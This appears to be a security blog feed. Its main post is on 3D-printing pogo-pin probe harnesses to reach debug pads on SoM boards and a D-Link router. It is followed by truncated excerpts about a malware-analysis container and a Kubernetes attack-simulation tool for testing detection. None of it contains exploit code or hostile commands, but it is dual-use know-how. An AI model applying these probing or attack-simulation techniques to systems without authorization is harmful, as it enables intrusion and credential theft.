Despite these advantages, FDM printers also come saddled with several disadvantages for this purpose. Most likely you will be printing with a .4mm nozzle, which will introduce challenges in slicing. FDM printers struggle to make corners without loss of dimensional accuracy due to expansion and shrinking of the printed material, especially when laid in the motions made by the printer to achieve a corner. Similarly, the printer must have flow, extruder steps, x/y skew, and print speed tuned in order to achieve dimensional accuracy.

IMG_6707.jpg
first_attempt_gantry.gif

Some of these disadvantages must be worked around, while others are more a function of how well your printer is tuned and maintained. Ordering such a part from an FDM shop may result in better or worse accuracy than you can achieve on your own with a little tuning, and it is likely if you are 3D printing already that you may have already undertaken steps to tune your printer.

By leaning on lessons learned from general 3D printing, the advantages of the speed and accessibility of FDM printers could be maintained by designing for the strengths of FDM printing rather than languishing in or attempting to design around its weaknesses. Care taken in tuning wall thicknesses, layer heights, flow, extrusion, thermal expansion offsetting, mesh bed leveling, vibration compensation and other features and settings can mitigate or even eliminate many of the disadvantages of FDM printing in our use case. That said, care must still be taken in the design of the model itself to ensure the strengths of the printer are exploited while the weaknesses, such as inability to print accurate corners, are avoided or eliminated altogether.

Plan of Attack

In order to determine the efficacy of this approach, I brainstormed a few different harness styles and chose the ones I thought would be most accomplishable at the outset. After developing a plan for harness styles, I gathered documentation and materials relating to the target device as well as the pins and sleeves I had on hand. Once materials were gathered, I rapidly printed and tested several design styles and documented what did and did not work with each including those ever-anticipated, unforeseen issues so commonly encountered when printing.

Preparation / Setup

Equipment, Tools, and Software I Used

CAD - Audodesk Fusion 360

For the design facets of this project I used Fusion, but any 3D modeling software you are comfortable with would be just fine! I have successfully used tools ranging from Tinkercad to Blender to Fusion to produce models for 3D printing, it all comes down to what works for you and whether it will facilitate precise dimensions in design.

Slicer - Cura

I chose Cura for slicing models for this project because I am most familiar with the nomenclature of the settings, which are crucial in this project for achieving dimensional accuracy. Again, this is not a requirement for your own purposes, any slicing software which allows you to achieve high dimensional accuracy would be fine.

Print Controller - Octoprint + Obico

I still use Octoprint because I find its plugin approach the easiest to work with in order to implement my enclosures’ sensors and relay controls. In addition to various sensors monitored directly by the printer mainboard and Octoprint via Raspberry Pi GPIOs, Obico is also used to monitor the print job from various cameras and automatically detect failures. It is important to note that modern printers have directly implemented many of these features and more.

Printer - Creality "Ender 3 Pro" (kind of)

The printer used for this project was originally an Ender 3 Pro, but has undergone enough modifications since 2014 that it is easy to question how much of the original printer remains. In this case, a dual-Z axis FDM printer configured for bowden extrusion with a high-temperature hot-end and automated bed leveling. For comparison, an untuned Bambu Labs A1 Mini was also used to print some of the prepared models.

Pins and Sleeves - R-50 Sleeves and P-50-B Pogo Pins

51uKRXd3CIL._AC_UF894,1000_QL80_.jpg
Screenshot 2025-04-24 at 1.47.41β€―PM.png

Which Target to Design For

I needed to select a device with a similar pattern of castellation In lieu of any customer's device. I cannot violate NDAs no matter how cool. I had a few in mind, but decided to explore a couple of options in case my first idea did not work out (it did not after all).

ESP32 SoM

612eALAbpgL.jpg
WRL-24806-1.jpg
Screenshot 2025-04-24 at 11.54.47β€―AM.png

Having used various patterns of ESP32 development boards dozens if not hundreds of times, I thought first of these devices for a facsimile to the original target which inspired this project. These devices include a castellated ESP32 SoM with sub-1.27mm pitch, which is too small to easily achieve a working probe as the width of even the internal pogo pin sleeves is too wide to align side-by-side.

Some efforts were made to achieve a design for this using a sort of X or criss-cross pattern of alignment for the pins, however this seemed too cumbersome to pursue first. This remains a desirable target due to the common pattern ESP32 SoM's immense ubiquity in consumer products such as the Hatch alarm clock pictured above, as well as commercial and industrial products alike.

To wit, occasionally you will find more uncommon patterns for ESP32 SoM boards, such as in Sainsmart weather meters as pictured below.

Uncommon Pattern ESP32 SoM

WaveShare ESP32-S3 Zero

WaveShare ESP32-S3 Zero

WaveShare produces a lot of products. Most of the time when I encounter one of their products as implemented in something else, it is a display. I have not yet encountered a WaveShare castellated ESP32-S3 SoM in the wild to date. With that all said, the 2.54mm pitch makes it an easy target for demonstration, however it is extremely uncommon compared to the pattern found on WROOM/WROVER/everything-with-wifi+bluetooth-you-crack-open.

An advantage of targeting this pattern worth mentioning is the lack of a third row of pins to probe. This type of pattern would be an ideal target for a clamp-style probe harness.

WaveShare RP2040 Zero

WaveShare RP2040 Zero

Almost the exact same pattern as their ESP32 Zero board, WaveShare's RP2040 castellated board also sports a 2.54mm pitch. Though I have not seen this pattern for an RP2040 in a product in the wild, nor any RP2040 yet, this specific model seems to be a fairly popular pattern for the RP2040 among Maker types based on casual searching.

For the purposes of this project, we select this board for our target. Note that the target is not necessarily what is important here, but rather whether or not this approach is viable for use in real world scenarios.

Designs

Wasted PLA

During the brainstorming phase I came up with several ideas for what styles of harness might enjoy the advantages of FDM printing more than grate against its weaknesses. Coupling those constraints also with a presumption that the simpler the design of the model itself is, the better. This resulted in setting aside designs which involved torsion springs and other mechanisms, such as clamps. This also precluded at the outset the use of compliant mechanisms, which would likely be a solution worth pursuing to one of the caveats encountered during this project.

Ultimately, I decided to pursue a simple Block-with-Holes design as this seemed to be the most simple design possible. As discussed later, however, this design introduced challenges which I had not anticipated. In light of those challenges, I ended up abandoning the block design in favor of another option, a Block-and-Compression Ring, mid-way through the project.

Box-with-Holes

Partially Assembled Probe Harness

Designing for the target

Where to point the pins

If your target has footprints available, lucky you! You could import those into your CAD software and use them to trace the outlines of your model and take Easy Street to your destination.

e699beff584140f790d3470039fd6c06 (1).png
Screenshot 2025-04-24 at 2.04.08β€―PM.png
Screenshot 2025-04-24 at 2.04.21β€―PM.png
Screenshot 2025-04-24 at 2.04.13β€―PM.png

If your target does not have a footprint, because it is not a consumer product but just some weird thing you found inside the plastic and maybe they drew the pads by hand, then you will need to turn left and take The Hard Way.

IMG_6721.jpg
IMG_6724.jpg
Screenshot 2025-04-24 at 2.12.31β€―PM.png
Screenshot 2025-04-24 at 2.06.16β€―PM.png
Screenshot 2025-04-24 at 2.06.21β€―PM.png

Little things

We can take advantage of the play afforded by the spring-loaded pogo pins to design a harness which will have some amount of grip on the target board. To do this, we can angle the slots for the pins inward at the bottom by a few degrees. In this case I chose 92 degrees as the angle for the pin slots, which I intended to result in having all of the pins somewhat compressed by friction against the vertical edge of the castellation.

Angling Pinholes

Here I thought I was being quite clever in attempting to design the model such that the slicer would create discrete circles for the holes in the model. My thinking during this process was that by slicing the holes as discrete individual circles, the best dimensional accuracy could be achieved, resulting in the ability to print a model which would accept the R-50 sleeves in a friction fit. Since using techniques otherwise viable for achieving friction fits in 3D prints such as expansion channels or increasing and lining the bore with flexible fins was not possible here due to the constraint of the .4mm nozzle size.

Screenshot 2025-04-24 at 2.07.18β€―PM.png
block_holes_slice.gif
block_holes_nozzle.gif
block_v5_gantry.gif

I initially used a .88mm hole to afford a very small clearance for the ~.86mm width of the R-50 sleeve and included a 1mm counterbore, which I had hoped would leverage the ridge on the end of the sleeve to increase friction for the fit.

Designing the Counter Bore

Immediately, the first major unforeseen caveat became apparent.

Top View of Diminishing Hole Size Along Rows

Attempting to print this model with an untuned Bambu Labs A1 Mini did not yield better results.

Holes Near Completely Sealed

All of my clever forethought about ensuring the circles laid down for the pin-holes were discrete was for naught. This created an issue wherein the constant hopping and retraction while printing the circles created a buildup at the nozzle which overpowered the static thermal expansion compensation. Thinking that it would be easier to just jam a .9mm needle through the holes to widen them rather than manually edit the G-Code for the print to increase the compensation to the flow setting along each row of holes, I carried on.

It soon became clear that this approach was not good for rapidly producing a usable harness. Even for the holes which seemed to have the best dimensional accuracy, it still required applying pressure to a delicate brass or copper sleeve. Attempts to assemble this version resulted in the loss of many good sleeves in crush accidents. Still some holes were too wide, and others too narrow, which seemed like too much delicate effort for something that was intended to be easier and faster (and cheaper) than existing solutions. It was getting dark, and I was starting to run out of pre-soldered sleeves.

IMG_6718.jpg
IMG_6710.jpg

At this point I tested increasing the width of the holes at the ends where they were becoming too narrow, and considering using a material like thread or magnet wire to shim the holes to achieve the friction fit I intended. Seeing no success in adjusting the hole diameters, or adding additional holes in the hopes that the effect would be pushed out to them instead, I decided to pivot to a different design.

First Layers of Box versus Compression Ring Designs

Compression Ring

I did not want to give up on printing a model which achieved a friction fit without a third material to shim. The other of the two designs seemed more complicated in that it would be two pieces which risked issues with clearance and fits. Despite that caveat, the two-piece design also afforded more flexibility in the friction applied to the pins, or so I had hoped.

final_gantry.gif
compression_ring_slice.gif
compressionring_holes_nozzle.gif

Design changes

Using the previous model as a starting point, I divided the model along the center axes of the rows of holes, and increased the distance of the edge-faces between each of the lengths of the former-holes to create more U-shaped channels. I also added dowels at 90 degrees to the interior corners where the two models combine in order to provide a constant friction not afforded by the +2 degree angle of the channeled faces. A clear advantage of the compression-ring style is that it is sliced as almost entirely unbroken lines, resulting in a significantly faster print. While the block-and-hole style harnesses were taking 40-50 minutes to complete, the compression ring design only took about 17 minutes.

Screenshot 2025-04-24 at 2.08.13β€―PM.png
Screenshot 2025-04-24 at 2.08.21β€―PM.png
Screenshot 2025-04-24 at 2.08.04β€―PM.png
Screenshot 2025-04-24 at 2.24.56β€―PM.png

After several iterations of this model, including attempting to add studs and bars to the interior of the compression ring at each pin, I found myself back to considering using glue, or some kind of shim material, to achieve a snug fit for each sleeve inside the model.

IMG_6716.jpg
IMG_6715.jpg

While I was impressed with the level of dimensional accuracy I was able to achieve with a .4mm nozzle and a decade old FDM printer-of-theseus, sub-milimeter features seem to be very difficult to print successfully.

Screenshot 2025-04-24 at 2.08.39β€―PM.png
missing_studs.png
IMG_6725.jpg

Well At Least We Learned Something

Using some simple glue, I went ahead and assembled a full model and performed a basic test, flashing the RP2040 and making it blink using the harness and a [????] programmer.

IMG_6729.jpg
IMG_6726.jpg
IMG_6728.jpg

While there were a few setbacks before reaching this point, none were so severe as to deter me from considering this approach in the future. The capability to design and manufacture bespoke probe harnesses to drop a single assembly into a target and probe all exposed interfaces in-situ within the span of a day or two is still highly appealing, even if it means using a little glue.

Conclusions

FDM printers require a lot of tuning to get close to decent dimensional accuracy. If the pitch of your target is too narrow, it will be difficult or even impossible to achieve a design which can be printed without using a staggered and criss-crossing approach, which further increases the complexity of the print. An SLA printer is going to outperform an FDM printer for these purposes, but these are not as approachable with an FDM printer.

While this seems challenging, I am excited to explore possible options to achieve this going forward. One good option for this is designing for bare pogo pins and shimming them in place with the lead wire as demonstrated below. Another approach might be to abandon pogo pins altogether and opt instead for solid-core copper wire which can be used to achieve clean prints for smaller pitched targets.

Despite these caveats and those which come along with attempting to FDM print any object, it still seems a viable method for designing probes even if a third material such as glue or shims are needed for a snug assembly.

With some lessons learned, particularly about how better to design the channels or holes for pins, I wanted to demonstrate the efficacy of FDM printers for rapidly developing test harnesses. To do this, I grabbed a D-Link router from the To-Hack pile, cracked it open and located an unpopulated interface. Within about one hour, including print and assembly time, I was able to prepare, apply, and use the harness.

Screenshot 2025-04-25 at 8.05.42β€―AM.png
Screenshot 2025-04-25 at 8.06.07β€―AM.png
Image from iOS (14).jpg

If you want to give these models a try yourself, copies of the .obj files are available on Sam’s GitHub.

Looking Forward

Some caveats for this style of probe harness might be overcome by using a narrower nozzle, such as .2mm, which I believe is worth exploring in the future.

In addition to this single-block style of probe harness, I think there is also value in the use of FDM printers to produce clamp style probes for common formats like SOIC8, as well as Electronics Acupuncture Probe (EAP) assemblies, which I look forward to experimenting with soon.

reverse engineering malware in a container - part 1

17 April 2025 at 19:02
part of the attack sim from the last post was an eBPF module that provided extended kernel-level monitoring and interference with processes. i thought it would be fun to reverse engineer it in a restricted environment, like a docker container. container the Dockerfile for the container is loaded with analysis tools. FROM ubuntu:20.04 # avoid interactive prompts during installation ENV DEBIAN_FRONTEND=noninteractive ENV TZ=Etc/UTC # install essential tools for binary analysis RUN apt-get update && apt-get install -y \ binutils \ file \ strace \ ltrace \ gdb \ radare2 \ python3 \ python3-pip \ python3-venv \ bsdutils \ xxd \ build-essential \ procps \ elfutils \ libcapstone-dev \ curl \ wget \ unzip \ git \ nano \ vim \ tcpdump \ tshark \ iputils-ping \ net-tools \ sudo \ golang \ binutils-dev \ libbfd-dev \ libz-dev \ python3-dev \ default-jre-headless \ cmake \ # add these eBPF analysis tools bpfcc-tools \ linux-headers-generic \ linux-tools-generic \ bpftrace \ util-linux \ # add dependencies for building bpftool libelf-dev \ # install bsdmainutils for hexdump bsdmainutils \ && apt-get clean && rm -rf /var/lib/apt/lists/* # install bpftool (if not included in linux-tools) RUN git clone --recurse-submodules https://github.

clusterfuck: attack sims on k8s clusters

9 April 2025 at 18:37
tl;dr clusterfuck is a multi-stage attack simulation against k8s environments. it performs executing privilege escalation, container escape, credential theft, lateral movement, and crypto mining techniques. it’s designed to validate detection capabilities in your cloud security posture management (CSPM) and endpoint detection and response (EDR) tools. when successful, it triggers 20+ high-severity security alerts across the attack chain, helping security teams test their defenses, improve detection coverage, and practice incident response.
❌